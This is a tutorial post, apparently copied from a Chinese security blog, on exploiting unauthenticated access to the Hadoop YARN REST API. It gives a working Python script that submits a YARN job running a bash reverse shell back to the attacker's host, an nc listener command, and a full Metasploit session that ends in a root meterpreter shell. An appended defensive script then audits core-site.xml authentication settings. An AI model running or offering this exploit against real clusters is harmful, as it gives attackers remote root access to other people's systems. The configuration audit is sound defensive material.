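    Exploiting Unauthorized Access to the Hadoop YARN REST API

    Hadoop is a distributed-system infrastructure developed by the Apache Foundation. YARN is the unified resource-management platform of a Hadoop system; its main role is the unified management and scheduling of cluster resources. The MapReduce computing framework can run as an application on top of YARN, with YARN managing the resources. Put simply, users can submit specific applications to YARN for execution, and those applications are allowed to run system commands.

    By default YARN opens ports 8088 and 8089.

    How to check whether the vulnerability exists: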

    curl -X POST 172.16.20.134:8088/ws/v1/cluster/apps/new-application
    

    A response like the following confirms that the vulnerability is present:

    Python exploit code:

    import requests
    
    target = 'http://172.16.20.134:8088/'
    lhost = '172.16.20.108'  # put your local host ip here, and listen at port 9999
    
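    # Step 1: ask the ResourceManager for a new application id
    url = target + 'ws/v1/cluster/apps/new-application'
    resp = requests.post(url)
    print(resp.text)
    app_id = resp.json()['application-id']
    # Step 2: submit an application whose container command is the payload
    url = target + 'ws/v1/cluster/apps'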
    data = {
        'application-id': app_id,
        'application-name': 'get-shell',
        'am-container-spec': {
            'commands': {
                'command': '/bin/bash -i >& /dev/tcp/%s/9999 0>&1' % lhost,
            },
        },
        'application-type': 'YARN',
    }
    print(data)
    requests.post(url, json=data)
    

    Listen locally and receive the shell:

    nc -lvp 9999
    

      

    Metasploit module:

    msf5 > use exploit/linux/http/hadoop_unauth_exec
    msf5 exploit(linux/http/hadoop_unauth_exec) > show options
    
    Module options (exploit/linux/http/hadoop_unauth_exec):
    
       Name     Current Setting  Required  Description
       ----     ---------------  --------  -----------
       Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
       RHOST                     yes       The target address
       RPORT    8088             yes       The target port (TCP)
       SRVHOST  0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
       SRVPORT  8080             yes       The local port to listen on.
       SSL      false            no        Negotiate SSL/TLS for outgoing connections
       SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
       URIPATH                   no        The URI to use for this exploit (default is random)
       VHOST                     no        HTTP server virtual host
    
    
    Exploit target:
    
       Id  Name
       --  ----
       0   Automatic
    
    
    msf5 exploit(linux/http/hadoop_unauth_exec) > set rhost 192.168.77.141
    rhost => 192.168.77.141
    msf5 exploit(linux/http/hadoop_unauth_exec) > set payload linux/x86/meterpreter/reverse_tcp
    payload => linux/x86/meterpreter/reverse_tcp
    msf5 exploit(linux/http/hadoop_unauth_exec) > show options
    
    Module options (exploit/linux/http/hadoop_unauth_exec):
    
       Name     Current Setting  Required  Description
       ----     ---------------  --------  -----------
       Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
       RHOST    192.168.77.141   yes       The target address
       RPORT    8088             yes       The target port (TCP)
       SRVHOST  0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
       SRVPORT  8080             yes       The local port to listen on.
       SSL      false            no        Negotiate SSL/TLS for outgoing connections
       SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
       URIPATH                   no        The URI to use for this exploit (default is random)
       VHOST                     no        HTTP server virtual host
    
    
    Payload options (linux/x86/meterpreter/reverse_tcp):
    
       Name   Current Setting  Required  Description
       ----   ---------------  --------  -----------
       LHOST                   yes       The listen address
       LPORT  4444             yes       The listen port
    
    
    Exploit target:
    
       Id  Name
       --  ----
       0   Automatic
    
    
    msf5 exploit(linux/http/hadoop_unauth_exec) > set lhost 192.168.77.141
    lhost => 192.168.77.141
    msf5 exploit(linux/http/hadoop_unauth_exec) > exploit
    
    [*] Started reverse TCP handler on 192.168.77.141:4444
    [*] Sending Command
    [*] Command Stager progress - 100.00% done (763/763 bytes)
    [*] Sending stage (853256 bytes) to 172.20.0.3
    [*] Meterpreter session 1 opened (192.168.77.141:4444 -> 172.20.0.3:34138) at 2018-05-15 03:21:17 -0400
    
    meterpreter > getuid
    Server username: uid=0, gid=0, euid=0, egid=0
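
A configuration check for the settings that decide whether the REST API accepts the unauthenticated POST shown above, as an added example that is not code from the original post: it reads a Hadoop `core-site.xml` and reports the HTTP authentication posture. The property names are Hadoop's; the defaults applied when a property is absent, the verdict labels and the sample XML are assumptions constructed for this example.

```python
import xml.etree.ElementTree as ET

# Values assumed when a property is absent (Hadoop's shipped defaults).
DEFAULTS = {
    "hadoop.http.authentication.type": "simple",
    "hadoop.http.authentication.simple.anonymous.allowed": "true",
}

def load_properties(xml_text):
    """Return {name: value} for every <property> in a Hadoop *-site.xml."""
    props = {}
    for prop in ET.fromstring(xml_text).iter("property"):
        name = (prop.findtext("name") or "").strip()
        if name:
            props[name] = (prop.findtext("value") or "").strip()
    return props

def audit_http_auth(xml_text):
    """Return (verdict, reason) for the web/REST authentication settings."""
    props = {**DEFAULTS, **load_properties(xml_text)}
    auth_type = props["hadoop.http.authentication.type"]
    anonymous = props["hadoop.http.authentication.simple.anonymous.allowed"].lower()
    if auth_type.lower() == "kerberos":
        return "ok", "SPNEGO/Kerberos is required on HTTP endpoints"
    if auth_type.lower() != "simple":
        return "review", "custom authentication handler: " + auth_type
    if anonymous == "true":
        return "open", "anonymous requests accepted, no credentials needed"
    return "weak", "identity is only the client-supplied user.name parameter"

# Constructed sample configurations, not taken from the page.
SAMPLE_DEFAULT = "<configuration></configuration>"
SAMPLE_NO_ANON = """<configuration>
  <property><name>hadoop.http.authentication.simple.anonymous.allowed</name>
            <value>false</value></property>
</configuration>"""
SAMPLE_KERBEROS = """<configuration>
  <property><name>hadoop.http.authentication.type</name>
            <value>kerberos</value></property>
</configuration>"""

if __name__ == "__main__":
    for label, xml_text in [("default", SAMPLE_DEFAULT),
                            ("no-anonymous", SAMPLE_NO_ANON),
                            ("kerberos", SAMPLE_KERBEROS)]:
        print(label, *audit_http_auth(xml_text))
```

A verdict of `ok` covers only these two properties; whether port 8088 is reachable from untrusted networks is a separate check.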
    

      

  • Original article: https://www.cnblogs.com/junsec/p/11390634.html